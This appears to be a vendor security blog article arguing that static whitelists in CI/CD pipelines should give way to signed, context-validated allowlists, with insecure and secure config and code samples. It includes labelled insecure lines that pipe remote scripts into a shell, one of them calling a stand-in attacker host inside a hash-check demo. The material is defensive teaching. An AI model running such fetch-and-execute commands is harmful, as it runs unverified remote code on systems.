Before looking at why we need to move away from whitelisting, let's define what a whitelist means in cybersecurity terms. A whitelist is a predefined list of trusted entities (IPs, domains, file hashes, repositories, or even Docker images) that a system automatically allows to interact with it. In development and CI/CD environments, whitelisting is commonly used to:

- Permit access to internal APIs or cloud endpoints

- Approve certain registries for pulling containers or dependencies

- Authorize specific IPs to trigger builds or deployments

⚠️ Insecure example, for educational purposes only. Do not use in production.

```yaml
# ❌ Static whitelist configuration
allowed_sources:
  - 10.10.0.1
  - registry.company.com
```

At first, this might look secure: only predefined entities can access the pipeline. But the idea breaks down once you realize that these static lists don't validate who or what is actually behind those entries. Attackers can spoof IPs, compromise trusted domains, or abuse unverified registries.

Secure configuration: dynamic allow list with context validation

```yaml
# ✅ Secure configuration example
allowlist_sources:
  - source: registry.company.com
    validate: signature && token
```

By replacing static whitelists with dynamic allow lists that include context validation (such as cryptographic signatures and authentication tokens), teams can ensure that only verified, authorized entities access pipelines or dependencies. In modern DevOps, whitelisting isn't just about limiting access; it's about understanding how much implicit trust your systems place in internal and external resources. And that's where the real risk lies.

Why Whitelisting Creates a False Sense of Security

Developers often use whitelists as a shortcut for “safe by default”: if an IP or repository is whitelisted, it's assumed safe. But that assumption rarely holds. Static whitelisting creates a false sense of security because:

- IPs or repositories change ownership or configuration.

- Trusted sources can be compromised.

- Dependencies inside “approved” registries may be hijacked.

- Whitelists aren’t context-aware; they don’t verify purpose or timing.

Imagine a whitelisted Git repository that gets taken over through a dependency hijack. Your CI/CD system still trusts it because it's “on the list.” This is how a whitelist shifts from a security control to a security liability.

Example of a risky assumption:

⚠️ Insecure example, for educational purposes only. Do not execute or reuse.

```bash
# ❌ Implicit trust in whitelisted domain
curl https://trusted-registry.company.com/install.sh | bash
```

If that endpoint is compromised, every pipeline that runs this command inherits the attack. That's why knowing what whitelisting means isn't enough; you need to understand how it fails under real-world conditions.
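Rather than piping a remote script straight into a shell, a pipeline can download it to a file, compare its SHA-256 digest against a value pinned in version control, and run it only on a match. The following is a minimal Python sketch of the comparison step, assuming the expected digest was recorded from a reviewed copy of the script; verify_script and PINNED_SHA256 are hypothetical names, not part of any tool mentioned here.

```python
import hashlib
import hmac


def verify_script(content: bytes, expected_sha256: str) -> bool:
    """Return True only if the content's SHA-256 digest equals the pinned hex digest."""
    actual = hashlib.sha256(content).hexdigest()
    # Constant-time comparison of the two hex strings
    return hmac.compare_digest(actual, expected_sha256.strip().lower())


# Hypothetical example: the pinned digest would normally be committed alongside
# the pipeline config after reviewing the script, not computed at run time.
reviewed = b"#!/bin/sh\necho installing\n"
PINNED_SHA256 = hashlib.sha256(reviewed).hexdigest()

# What a compromised endpoint might serve instead
served = b"#!/bin/sh\ncurl https://attacker.example/x | sh\n"

print(verify_script(reviewed, PINNED_SHA256))  # True
print(verify_script(served, PINNED_SHA256))    # False
```

Because the digest is pinned, a compromised endpoint serving a modified install.sh produces a mismatch and the script never runs, even though the domain is still trusted.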

Real-World Whitelisting Risks in CI/CD Pipelines and Registries

CI/CD pipelines are a prime example of how whitelisting can turn from a safeguard into a silent backdoor. When trust is static and unverified, attackers only need one weak spot to compromise the entire chain.

Example 1: Compromised Package Source

A whitelisted internal artifact registry mirrors open-source dependencies. One malicious update slips through, and the pipeline downloads it automatically.

Because the registry is whitelisted, no additional validation occurs.

⚠️ Insecure example, for educational purposes only. Do not use in production.

```yaml
# ❌ Static trust in internal registry
sources:
  - registry.internal.company.com
```

Secure configuration: registry signature and integrity validation

```yaml
# ✅ Verify integrity before fetching artifacts
sources:
  - registry.internal.company.com
validate: signature && checksum
```

Always verify registry sources cryptographically to prevent compromised mirrors from poisoning your software supply chain.
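One way to apply the checksum half of this is to keep a lockfile of expected digests in version control and reject any fetched artifact that is either missing from the lockfile or fails to match it. The sketch below is a minimal illustration; the lock mapping, artifact names, and check_artifacts helper are hypothetical. A checksum proves the bytes haven't changed since they were pinned, not who published them, so it complements signature verification rather than replacing it.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_artifacts(fetched: dict[str, bytes], lock: dict[str, str]) -> list[str]:
    """Return a list of problems; an empty list means every artifact is pinned and matches."""
    problems = []
    for name, data in sorted(fetched.items()):
        expected = lock.get(name)
        if expected is None:
            # Fail closed: an artifact the lockfile doesn't know about is rejected,
            # even if it came from an allowlisted registry.
            problems.append(f"{name}: not in lockfile")
        elif sha256_hex(data) != expected:
            problems.append(f"{name}: digest mismatch")
    return problems


# Hypothetical lockfile entry and fetched artifacts from a compromised mirror
lock = {"libfoo-1.2.0.tgz": sha256_hex(b"libfoo release")}
fetched = {
    "libfoo-1.2.0.tgz": b"libfoo release (tampered mirror)",
    "libbar-0.1.0.tgz": b"unexpected dependency",
}
for problem in check_artifacts(fetched, lock):
    print(problem)
```

A CI job would fail whenever the returned list is non-empty, so a poisoned mirror cannot slip an update through just because the registry itself is trusted.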

Example 2: Static IP Trust in Cloud Deployments

Cloud-based whitelists often allow deployment traffic only from specific IPs.

But when developers work remotely or through dynamic VPNs, “temporary” exceptions are added and rarely removed. Over time, these exceptions create unmanaged exposure.

⚠️ Insecure example, for educational purposes only. Do not use in production.

```yaml
# ❌ Overly permissive IP whitelist
allowed_ips:
  - 10.10.0.5
  - 192.168.1.25
  - 203.0.113.42  # temporary exception
```

Secure configuration: context-aware dynamic access

```yaml
# ✅ Dynamic allowlist with authentication
access_rules:
  - context: dev_vpn
    validate: mfa && token
```

Instead of relying solely on static IPs, use identity-based and contextual validation, such as MFA, short-lived tokens, and VPN posture checks.
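To make the idea concrete, here is a minimal sketch of a short-lived, HMAC-signed access token that carries an MFA claim and a network context, checked on every request instead of the caller's IP. The token layout, the claim names (sub, ctx, mfa, exp), and the shared SECRET are all hypothetical; production systems would normally rely on an established format such as OIDC/JWT tokens issued by an identity provider.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Hypothetical shared secret for illustration; in practice it lives in a vault or KMS.
SECRET = b"hypothetical-signing-secret"


def _sign(payload_b64: bytes, secret: bytes) -> bytes:
    return base64.urlsafe_b64encode(hmac.new(secret, payload_b64, hashlib.sha256).digest())


def issue_token(claims: dict, secret: bytes = SECRET) -> str:
    payload_b64 = base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode())
    return f"{payload_b64.decode()}.{_sign(payload_b64, secret).decode()}"


def validate_token(token: str, required_ctx: str, secret: bytes = SECRET,
                   now: Optional[float] = None) -> bool:
    parts = token.split(".")
    if len(parts) != 2:
        return False
    payload_b64, sig_b64 = parts
    # Reject forged or modified tokens before trusting any claim
    if not hmac.compare_digest(_sign(payload_b64.encode(), secret), sig_b64.encode()):
        return False
    claims = json.loads(base64.urlsafe_b64decode(payload_b64))
    now = time.time() if now is None else now
    return (
        claims.get("mfa") is True              # caller completed MFA
        and claims.get("ctx") == required_ctx  # request comes from the expected context
        and claims.get("exp", 0) > now         # token is still within its short lifetime
    )


token = issue_token({"sub": "dev-42", "ctx": "dev_vpn", "mfa": True, "exp": time.time() + 300})
print(validate_token(token, "dev_vpn"))                         # True
print(validate_token(token, "public_internet"))                 # False: wrong context
print(validate_token(token, "dev_vpn", now=time.time() + 600))  # False: expired
```

The five-minute lifetime is the key design choice: a leaked token is only useful briefly, whereas a static IP entry stays valid until someone remembers to remove it.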

Example 3: Trusted Container Images

A whitelisted Docker image tagged “latest” can change silently, because a tag is a mutable pointer that can be re-pushed to reference a different image.

If that image is replaced with a compromised version, your entire build pipeline inherits the malicious code.

⚠️ Insecure example, for educational purposes only. Do not use in production.

```dockerfile
# ❌ Insecure Dockerfile trusting whitelisted image
FROM registry.company.com/base:latest
```

Secure Dockerfile with pinned and verified image

```dockerfile
# ✅ Secure: pin image digest and verify integrity
FROM registry.company.com/base@sha256:abc123...
```

Always pin image digests and verify them cryptographically to prevent dependency drift or image tampering.
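A lightweight pre-build check can enforce pinning. This minimal sketch scans Dockerfile text and reports FROM lines whose image is not pinned by a full sha256 digest. It is a deliberately simplified parser: it skips flags such as --platform, ignores ARG substitution, and treats earlier stage aliases and scratch as safe. The unpinned_images helper and the placeholder digest are hypothetical.

```python
import re

# FROM [--flag=value ...] <image> [AS <alias>], case-insensitive like Dockerfile instructions
FROM_RE = re.compile(
    r"^\s*FROM\s+(?:--\S+\s+)*(?P<image>\S+)(?:\s+AS\s+(?P<alias>\S+))?",
    re.IGNORECASE,
)
# A pinned reference ends in a full 64-hex-character sha256 digest
DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")


def unpinned_images(dockerfile: str) -> list[str]:
    """Return image references in FROM lines that are not pinned by digest."""
    stages: set[str] = set()
    unpinned = []
    for line in dockerfile.splitlines():
        match = FROM_RE.match(line)
        if not match:
            continue
        image = match.group("image")
        is_stage = image.lower() in stages  # e.g. "FROM builder" after "... AS builder"
        if not is_stage and image.lower() != "scratch" and not DIGEST_RE.search(image):
            unpinned.append(image)
        if match.group("alias"):
            stages.add(match.group("alias").lower())
    return unpinned


pinned = "registry.company.com/base@sha256:" + "a" * 64  # placeholder digest
dockerfile = (
    "FROM registry.company.com/base:latest AS builder\n"
    f"FROM {pinned}\n"
    "COPY --from=builder /app /app\n"
)
print(unpinned_images(dockerfile))  # ['registry.company.com/base:latest']
```

Failing the CI job whenever this list is non-empty keeps a mutable tag from quietly slipping back into the build.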

Example 4: Token Leakage via Logs

Even with strong whitelisting, secrets can be exposed through careless logging practices.

Once a token appears in logs, it can be harvested and reused by attackers, regardless of IP restrictions.

⚠️ Insecure example, for educational purposes only. Do not use in production.

```bash
# ❌ Printing tokens in logs (risky in whitelisted pipelines)
echo "Deploying with token: $DEPLOY_TOKEN"
```

Secure: mask or vault secrets in logs

```bash
# ✅ Secure: use masked or vaulted secrets
echo "Deploying with masked token"  # never print raw tokens or credentials
```

Always mask, vault, or inject secrets at runtime to prevent exposure in build or deployment logs.
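As a defense-in-depth layer on top of a CI platform's own secret masking, a Python-based deploy script can redact known secret values before anything reaches the log. This is a minimal sketch built on the standard logging.Filter hook; reading DEPLOY_TOKEN from the environment mirrors the shell example, while the RedactSecrets class name and the fallback value are hypothetical.

```python
import logging
import os


class RedactSecrets(logging.Filter):
    """Replace known secret values in a log record's message with a fixed mask."""

    def __init__(self, secrets: list[str]):
        super().__init__()
        # Drop empty values: masking "" would corrupt every message
        self.secrets = [s for s in secrets if s]

    def filter(self, record: logging.LogRecord) -> bool:
        message = record.getMessage()  # apply %-style args first, then redact
        for secret in self.secrets:
            message = message.replace(secret, "***")
        record.msg, record.args = message, None
        return True  # keep the record; only its text is changed


# DEPLOY_TOKEN mirrors the shell example; the fallback value is a hypothetical placeholder
token = os.environ.get("DEPLOY_TOKEN", "hypothetical-token-123")
logger = logging.getLogger("deploy")
handler = logging.StreamHandler()
handler.addFilter(RedactSecrets([token]))
logger.addHandler(handler)
logger.setLevel(logging.INFO)
logger.info("Deploying with token: %s", token)  # the token value is replaced by *** in the output
```

Attaching the filter to the handler rather than the logger means it also covers records propagated from child loggers. It only redacts the formatted message, though; tracebacks and output from other tools still depend on the platform's masking.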

In all these cases, whitelisting was used with good intentions, but without context validation, it provided attackers with a shortcut straight into trusted systems.

From Whitelist to Allowlist: Shifting Toward Context-Aware Controls

Security teams and DevSecOps engineers have been phasing out the term “whitelist” not only for inclusivity but also to reflect a conceptual shift: from static trust to contextual verification.

An allowlist still defines permitted sources (just as a denylist defines blocked ones), but it adds context-awareness, evaluating why, when, and under what conditions an entity should be trusted.

Instead of asking, “Is this IP whitelisted?”, we should ask, “Does this request come from a signed, verified, and expected source at the right time?”

Mini Checklist: Secure Whitelisting Alternatives

- Use allowlists that include identity, context, and time-based validation.

- Replace static IP rules with attribute-based access control (ABAC) policies.

- Verify artifact signatures instead of just trusting domains.

- Enforce TLS + token validation for every request.

- Continuously audit and expire allowlist entries.

Example:

```
# ✅ Secure allowlist rule (context-aware)
allow if request.source == "registry.company.com"
  and request.artifact.signed == true
  and build.branch == "main"
```

This dynamic rule replaces a static whitelist entry with real-time validation based on trust attributes.
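The same rule can be expressed in ordinary code, which also makes the contrast with a plain whitelist easy to see. In this minimal Python sketch, the Request fields are hypothetical stand-ins for whatever a pipeline or policy engine exposes (artifact_signed plays the role of request.artifact.signed). In practice, that flag should come from an actual signature check, not from metadata the requester supplies.

```python
from dataclasses import dataclass

TRUSTED_REGISTRY = "registry.company.com"
PROTECTED_BRANCH = "main"


@dataclass(frozen=True)
class Request:
    source: str
    artifact_signed: bool
    branch: str


def static_whitelist_allows(req: Request) -> bool:
    # Old model: only asks "is the source on the list?"
    return req.source == TRUSTED_REGISTRY


def contextual_allow(req: Request) -> bool:
    # Context-aware model: source, artifact signature, and build branch must all check out
    return (
        req.source == TRUSTED_REGISTRY
        and req.artifact_signed
        and req.branch == PROTECTED_BRANCH
    )


# An unsigned artifact from the trusted registry, built from a feature branch
req = Request(source="registry.company.com", artifact_signed=False, branch="feature/x")
print(static_whitelist_allows(req))  # True
print(contextual_allow(req))         # False
```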

Applying Secure Whitelisting Alternatives in DevOps Workflows

Replacing traditional whitelisting with context-driven validation in DevOps doesn’t mean removing trust lists altogether; it means evolving them.

Practical approaches include:

- Dynamic Policy Enforcement: Use policy-as-code to evaluate trust conditions dynamically.

- Artifact Signing and Verification: Require signed images and dependencies.

- Continuous Validation: Re-verify trusted endpoints at runtime.

- Zero-Trust Networking: Restrict all egress traffic unless explicitly validated.

For example, secure pipelines can include automated checks:

```yaml
security-check:
  script:
    - xygeni validate --artifacts --signatures --trusted-sources
```

CI guardrail: fail if unsigned or unverified artifacts are detected

```bash
if ! xygeni verify --artifacts --signatures; then
  echo "Unverified artifact detected: failing pipeline" && exit 1
fi
```


These checks prevent unverified or compromised dependencies from running, even if they originate from a previously trusted registry.

Understanding what a whitelist means today is about realizing that it isn't a control on its own; it's a starting point for smarter, adaptive access validation.
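The zero-trust networking item among the practical approaches in this section hinges on deny-by-default: outbound requests are refused unless the destination matches an explicit rule. Below is a minimal sketch of such an egress check, assuming hypothetical rules that allow only the two registries named in this article and only over HTTPS. In practice, enforcement usually belongs in an egress proxy, firewall, or network policy rather than in application code.

```python
from urllib.parse import urlsplit

# Hypothetical egress rules: the only hosts this build may reach, and only over HTTPS
EGRESS_ALLOW = {"registry.company.com", "registry.internal.company.com"}


def egress_allowed(url: str) -> bool:
    """Deny by default; allow only HTTPS requests to an exactly matching host."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False  # plaintext and unknown schemes are denied
    host = (parts.hostname or "").rstrip(".")  # hostname is already lowercased
    # Exact match, so look-alikes such as registry.company.com.attacker.example fail
    return host in EGRESS_ALLOW


for url in (
    "https://registry.company.com/v2/",
    "http://registry.company.com/v2/",
    "https://registry.company.com.attacker.example/payload",
):
    print(url, "->", "allow" if egress_allowed(url) else "deny")
```

Exact host matching is intentionally strict. A suffix or substring check would let look-alike domains through, which is exactly the kind of implicit trust this article argues against.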

Integrating Policy-as-Code and Real-Time Validation

Static whitelists have no place in automated, fast-moving pipelines. Policy-as-code and real-time validation give developers and security teams a better way to enforce trust boundaries dynamically.

Modern DevSecOps workflows should:

- Define allow/deny logic in version-controlled policies.

- Continuously validate incoming requests against signed metadata.

- Use telemetry and anomaly detection to flag unexpected behavior.
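The first point can be illustrated without any particular tool. In this minimal sketch, allow and deny rules live as data (the JSON string stands in for a version-controlled policy file), explicit deny rules take precedence, and anything that matches no rule is denied. The rule schema, field names, and glob matching are hypothetical choices made for illustration; real policy-as-code engines use their own policy languages.

```python
import fnmatch
import json

# Hypothetical contents of a version-controlled policy file
POLICY_JSON = """
{
  "deny": [
    {"source": "*", "signed": false}
  ],
  "allow": [
    {"source": "registry.company.com", "branch": "main"},
    {"source": "registry.internal.company.com", "branch": "release/*"}
  ]
}
"""


def rule_matches(rule: dict, request: dict) -> bool:
    """A rule matches when every field it names matches the request."""
    for key, expected in rule.items():
        if key not in request:
            return False
        actual = request[key]
        if isinstance(expected, str):
            # String fields are shell-style globs
            if not isinstance(actual, str) or not fnmatch.fnmatchcase(actual, expected):
                return False
        elif actual != expected:
            return False
    return True


def evaluate(policy: dict, request: dict) -> str:
    if any(rule_matches(r, request) for r in policy.get("deny", [])):
        return "deny"  # explicit deny always wins
    if any(rule_matches(r, request) for r in policy.get("allow", [])):
        return "allow"
    return "deny"  # nothing matched: deny by default


policy = json.loads(POLICY_JSON)
print(evaluate(policy, {"source": "registry.company.com", "branch": "main", "signed": True}))   # allow
print(evaluate(policy, {"source": "registry.company.com", "branch": "main", "signed": False}))  # deny
print(evaluate(policy, {"source": "cdn.example.net", "branch": "main", "signed": True}))        # deny
```

Evaluating deny rules first means a later, overly broad allow rule cannot reopen access to unsigned artifacts. Because the policy is a file, every change to it goes through the same review and history as code.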

Example integration:

```yaml
validate-access:
  script:
    - xygeni enforce --policy allowlist.yaml --dynamic-context
```

Continuous validation tip: always review and rotate allowlist entries periodically. Remove unused sources and enforce revalidation on policy updates.

This combines context verification with continuous monitoring, turning access control from a passive whitelist into an active, adaptive defense layer. Policy-as-code shifts the meaning of a trusted entry from “hardcoded trust” to “trust verified in real time.”
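The rotation tip is easier to enforce when every allowlist entry carries an owner and an expiry date. That way, stale “temporary” exceptions surface automatically instead of depending on someone remembering them. The following is a minimal sketch; the AllowEntry fields, the owner names, and the prune_expired helper are hypothetical.

```python
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class AllowEntry:
    source: str
    owner: str
    expires: date


def prune_expired(entries: list[AllowEntry], today: date) -> tuple[list[AllowEntry], list[AllowEntry]]:
    """Split entries into (still active, expired); expired ones must be removed or re-approved."""
    active = [e for e in entries if e.expires > today]
    expired = [e for e in entries if e.expires <= today]
    return active, expired


entries = [
    AllowEntry("registry.company.com", "platform-team", date(2030, 1, 1)),
    AllowEntry("203.0.113.42", "dev-team", date(2024, 3, 31)),  # the "temporary exception"
]
active, expired = prune_expired(entries, today=date(2025, 1, 1))
for e in expired:
    print(f"expired: {e.source} (owner: {e.owner}, expired {e.expires.isoformat()})")
```

Running a check like this on a schedule, and failing or opening a ticket when anything has expired, turns “review periodically” from a good intention into an enforced step.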

From Static Trust to Verified Trust

For developers, understanding what whitelisting means is more than learning a cybersecurity term; it's about recognizing the risks of static trust in fast-moving, automated systems. Modern pipelines, registries, and repositories demand dynamic validation, not blind faith. Moving from whitelists to allow lists, from static trust to verified trust, is the only way to keep CI/CD environments secure and resilient.



Tools like Xygeni help DevSecOps teams detect unsafe configurations, enforce dynamic trust policies, and verify every source, package, and artifact across the software supply chain.

A whitelist used to mean “safe.” Today, safe means verified. It's time to stop whitelisting and start validating.